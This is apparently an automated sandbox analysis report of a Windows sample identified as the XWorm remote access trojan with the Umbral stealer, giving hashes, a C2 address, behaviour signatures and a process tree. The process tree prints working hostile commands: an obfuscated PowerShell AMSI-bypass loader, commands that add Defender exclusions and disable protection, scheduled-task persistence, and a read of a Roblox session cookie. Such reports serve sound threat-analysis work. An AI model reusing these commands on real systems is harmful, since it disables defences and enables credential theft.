Analysis

  • max time kernel
    150s
  • max time network
    131s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240704-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-07-2024 17:48

General

  • Target

    rootkit.exe

  • Size

    274KB

  • MD5

    87119ce97d460721e8c6cb98f990c780

  • SHA1

    eac69d7550546b7812eb5701e82e079ff780d93a

  • SHA256

    f01ae2632bb62a8f559472eaa31a863b82a04821dbdf8adbda7dab3db14d41cc

  • SHA512

    fce0177ad8df7622692919ff8493a9194b806774ca8508a4d28414d75e400bdf26b41818f12ad61a15a0860611d0d978d74660b970b9738c3d2b651e25290fcb

  • SSDEEP

    6144:WZL665pSvWs4dNwLIdh+JR5d3fFbeT8UumB2p3H1s93LZG9B:WlKWtnvKR51fy8VZKTo

Malware Config

Extracted

Family

xworm

Version

5.0

C2

127.0.0.1:49403

quotes-suites.gl.at.ply:49403

quotes-suites.gl.at.ply.gg:49403

Mutex

25nhnSSJeo8OHnH7

Attributes
  • Install_directory

    %AppData%

  • install_file

    XClient.exe

aes.plain

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 21 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 53 IoCs
  • Modifies registry class 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 46 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:616
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:64
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{49e990c2-b96a-4efd-b3e4-8c68b74f26ba}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:3652
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:672
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:952
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:736
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:896
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                1⤵
                • Drops file in System32 directory
                PID:1112
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1164
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1172
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1180
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2772
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:AwSxkPIJJAyW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$viULjJaneOFgoE,[Parameter(Position=1)][Type]$HywweUOfax)$tcpewosFoPt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+'f'+'l'+'e'+''+'c'+''+[Char](116)+'e'+[Char](100)+''+[Char](68)+''+'e'+''+'l'+'e'+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+'e'+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+[Char](121)+'D'+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+'c'+[Char](44)+'S'+[Char](101)+'al'+[Char](101)+''+[Char](100)+''+','+'A'+[Char](110)+'s'+'i'+''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+','+'A'+'u'+'t'+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$tcpewosFoPt.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+'a'+'lN'+[Char](97)+''+[Char](109)+''+'e'+''+','+''+[Char](72)+'ide'+[Char](66)+''+'y'+''+'S'+''+'i'+''+'g'+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$viULjJaneOFgoE).SetImplementationFlags('R'+[Char](117)+''+'n'+''+'t'+''+[Char](105)+'m'+[Char](101)+','+'M'+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+'e'+'d'+'');$tcpewosFoPt.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+'e',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+''+[Char](44)+''+'N'+''+'e'+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+''+'t'+''+','+''+[Char](86)+''+[Char](105)+'r'+'t'+''+'u'+''+[Char](97)+''+'l'+'',$HywweUOfax,$viULjJaneOFgoE).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $tcpewosFoPt.CreateType();}$PkCrCYpVPEuKw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+'y'+'s'+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+'o'+''+[Char](102)+''+'t'+''+[Char](46)+''+'W'+''+'i'+''+[Char](110)+''+[Char](51)+''+'2'+'.'+'U'+''+[Char](110)+'s'+'a'+''+'f'+''+'e'+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+''+'v'+'e'+[Char](77)+''+'e'+''+[Char](116)+''+[Char](104)+''+'o'+''+[Char](100)+''+'s'+'');$vNVfOFPjvzWEJI=$PkCrCYpVPEuKw.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+'t'+''+[Char](97)+''+'t'+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$KjvmLkEQFcFpsjShEBs=AwSxkPIJJAyW @([String])([IntPtr]);$CLXCaaVPhbfuYmEIXCeBDV=AwSxkPIJJAyW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$dxhAEsDBBvF=$PkCrCYpVPEuKw.GetMethod(''+'G'+'e'+[Char](116)+''+'M'+''+[Char](111)+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+'n'+''+[Char](101)+''+[Char](108)+'3'+'2'+''+[Char](46)+'d'+'l'+''+[Char](108)+'')));$zFuiQgIysvDznc=$vNVfOFPjvzWEJI.Invoke($Null,@([Object]$dxhAEsDBBvF,[Object](''+[Char](76)+'o'+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'b'+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+[Char](65)+'')));$wiFExwGurkYEtfwsM=$vNVfOFPjvzWEJI.Invoke($Null,@([Object]$dxhAEsDBBvF,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+'t'+'u'+''+[Char](97)+''+'l'+''+'P'+'r'+[Char](111)+''+[Char](116)+'ec'+'t'+'')));$pAuXrxr=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($zFuiQgIysvDznc,$KjvmLkEQFcFpsjShEBs).Invoke(''+'a'+'m'+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$rCCUSlwRveMBzKVBr=$vNVfOFPjvzWEJI.Invoke($Null,@([Object]$pAuXrxr,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+''+[Char](97)+''+[Char](110)+''+[Char](66)+''+[Char](117)+''+'f'+''+'f'+'er')));$JRAIIKrGLL=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wiFExwGurkYEtfwsM,$CLXCaaVPhbfuYmEIXCeBDV).Invoke($rCCUSlwRveMBzKVBr,[uint32]8,4,[ref]$JRAIIKrGLL);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$rCCUSlwRveMBzKVBr,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($wiFExwGurkYEtfwsM,$CLXCaaVPhbfuYmEIXCeBDV).Invoke($rCCUSlwRveMBzKVBr,[uint32]8,0x20,[ref]$JRAIIKrGLL);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+'F'+'T'+''+[Char](87)+'A'+'R'+''+[Char](69)+'').GetValue(''+[Char](119)+'ww'+[Char](115)+''+[Char](116)+''+'a'+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
                        2⤵
                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                        • Drops file in System32 directory
                        • Suspicious use of SetThreadContext
                        • Modifies data under HKEY_USERS
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:3688
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          3⤵
                            PID:464
                        • C:\Users\Admin\AppData\Roaming\XClient.exe
                          C:\Users\Admin\AppData\Roaming\XClient.exe
                          2⤵
                          • Executes dropped EXE
                          PID:3612
                        • C:\Users\Admin\AppData\Roaming\XClient.exe
                          C:\Users\Admin\AppData\Roaming\XClient.exe
                          2⤵
                          • Executes dropped EXE
                          PID:1700
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1252
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1304
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1316
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                              1⤵
                                PID:1424
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                1⤵
                                  PID:1456
                                  • C:\Windows\system32\sihost.exe
                                    sihost.exe
                                    2⤵
                                    • Modifies registry class
                                    PID:2660
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                  1⤵
                                    PID:1520
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1528
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1668
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                        1⤵
                                          PID:1676
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                          1⤵
                                            PID:1764
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1788
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                              1⤵
                                                PID:1880
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1944
                                                • C:\Windows\System32\svchost.exe
                                                  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                  1⤵
                                                    PID:1956
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                    1⤵
                                                      PID:1036
                                                    • C:\Windows\system32\svchost.exe
                                                      C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                      1⤵
                                                        PID:1664
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                        1⤵
                                                          PID:1784
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2108
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2196
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2364
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2472
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                  1⤵
                                                                    PID:2480
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                    1⤵
                                                                      PID:2684
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                      1⤵
                                                                      • Drops file in System32 directory
                                                                      PID:2748
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2796
                                                                      • C:\Windows\sysmon.exe
                                                                        C:\Windows\sysmon.exe
                                                                        1⤵
                                                                          PID:2820
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                          1⤵
                                                                            PID:2852
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                            1⤵
                                                                              PID:2864
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:2992
                                                                              • C:\Windows\system32\wbem\unsecapp.exe
                                                                                C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                                1⤵
                                                                                  PID:652
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                  1⤵
                                                                                    PID:3368
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:3440
                                                                                    • C:\Users\Admin\AppData\Local\Temp\rootkit.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\rootkit.exe"
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • Adds Run key to start application
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:3604
                                                                                      • C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe"
                                                                                        3⤵
                                                                                        • Checks computer location settings
                                                                                        • Drops startup file
                                                                                        • Executes dropped EXE
                                                                                        • Adds Run key to start application
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2808
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\www.DeadSecObbbfuscation.exe'
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4964
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'www.DeadSecObbbfuscation.exe'
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:1896
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:1072
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
                                                                                          4⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:4864
                                                                                        • C:\Windows\System32\schtasks.exe
                                                                                          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
                                                                                          4⤵
                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                          PID:2500
                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            5⤵
                                                                                              PID:2452
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Modify.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\Modify.exe"
                                                                                          3⤵
                                                                                          • Drops file in Drivers directory
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:4260
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Modify.exe'
                                                                                            4⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4200
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                                                                            4⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1468
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                            4⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3068
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                            4⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3684
                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                            "wmic.exe" os get Caption
                                                                                            4⤵
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1408
                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                            "wmic.exe" computersystem get totalphysicalmemory
                                                                                            4⤵
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:4612
                                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                                            "wmic.exe" csproduct get uuid
                                                                                            4⤵
                                                                                              PID:3364
                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                              4⤵
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              PID:3048
                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                              "wmic" path win32_VideoController get name
                                                                                              4⤵
                                                                                              • Detects videocard installed
                                                                                              PID:1544
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\www.DeadSec0000000000-obfusecator.exe'
                                                                                            3⤵
                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:972
                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                            "C:\Windows\System32\schtasks.exe" /Create /F /TN "www.DeadSec0000000000-obfusecator" /SC ONLOGON /TR "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe" /RL HIGHEST
                                                                                            3⤵
                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                            PID:4324
                                                                                          • C:\ProgramData\www.DeadSec0000000000-obfusecator.exe
                                                                                            "C:\ProgramData\www.DeadSec0000000000-obfusecator.exe"
                                                                                            3⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:4312
                                                                                        • C:\Windows\system32\taskmgr.exe
                                                                                          "C:\Windows\system32\taskmgr.exe" /4
                                                                                          2⤵
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          • Suspicious use of SendNotifyMessage
                                                                                          PID:4824
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                        1⤵
                                                                                          PID:3560
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:3784
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                              PID:3940
                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                              1⤵
                                                                                                PID:4148
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                1⤵
                                                                                                  PID:4928
                                                                                                • C:\Windows\System32\svchost.exe
                                                                                                  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                  1⤵
                                                                                                    PID:3236
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                    1⤵
                                                                                                      PID:4516
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                      1⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:4256
                                                                                                    • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                      "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                      1⤵
                                                                                                      • Modifies data under HKEY_USERS
                                                                                                      PID:2124
                                                                                                    • C:\Windows\system32\SppExtComObj.exe
                                                                                                      C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:2228
                                                                                                      • C:\Windows\System32\svchost.exe
                                                                                                        C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                        1⤵
                                                                                                          PID:3680
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                          1⤵
                                                                                                            PID:2008
                                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                            1⤵
                                                                                                              PID:4220
                                                                                                            • C:\Windows\System32\RuntimeBroker.exe
                                                                                                              C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                              1⤵
                                                                                                                PID:3476
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:1968
                                                                                                                • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  1⤵
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                  • Checks processor information in registry
                                                                                                                  • Enumerates system info in registry
                                                                                                                  PID:3232
                                                                                                                • C:\Windows\system32\DllHost.exe
                                                                                                                  C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
                                                                                                                  1⤵
                                                                                                                    PID:2936
                                                                                                                  • C:\Windows\system32\backgroundTaskHost.exe
